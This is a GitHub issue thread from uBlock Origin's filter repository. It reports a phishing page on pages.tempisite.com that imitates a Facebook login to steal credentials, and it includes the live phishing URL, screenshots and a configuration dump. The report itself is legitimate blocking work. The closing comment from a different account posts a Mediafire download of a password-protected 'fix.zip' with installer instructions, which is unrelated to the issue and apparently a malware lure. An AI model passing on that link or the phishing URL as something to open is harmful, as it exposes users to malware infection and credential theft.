### ISSUE TITLE
pages.tempisite.com: privacy

### ISSUE THREAD

**Issue by ZachjuKamashi** [uBlockOrigin/uAssets#25067]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://pages.tempisite.com/`

### Category

privacy

### Description

This is a phishing site that I received from an account stealer on facebook. This is the exact link I received. Warning it is a phishing site, open at your own discretion! https://pages.tempisite.com/1667979
It's made to look like a facebook login screen to steal your credentials, However if you remove "/1667979" from the link it becomes a fake web hosting site where the buttons do nothing at all.

### Other extensions used

none

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![Screenshot (872)](https://github.com/user-attachments/assets/a4debede-bd95-4911-a726-8706e846c56d)
![Screenshot (873)](https://github.com/user-attachments/assets/f30457fc-2e0f-4964-9118-d821547cad27)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 115
filterset (summary):
 network: 153304
 cosmetic: 47957
 scriptlet: 20655
 html: 1935
listset (total-discarded, last-updated):
 default:
  user-filters: 14-0, never
  ublock-filters: 39838-126, now
  ublock-badware: 10757-6, now
  ublock-privacy: 1065-4, now
  ublock-unbreak: 2526-1, now
  ublock-quick-fixes: 204-4, now
  easylist: 85586-178, now
  easyprivacy: 53055-64, now
  urlhaus-1: 28790-0, now
  plowe-0: 3545-993, now
filterset (user): [array of 14 redacted]
trustedset:
 added: [array of 7 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 40626 ms (selfie)
 maxAssetCacheWait: 1903 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 0
```
</details>

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
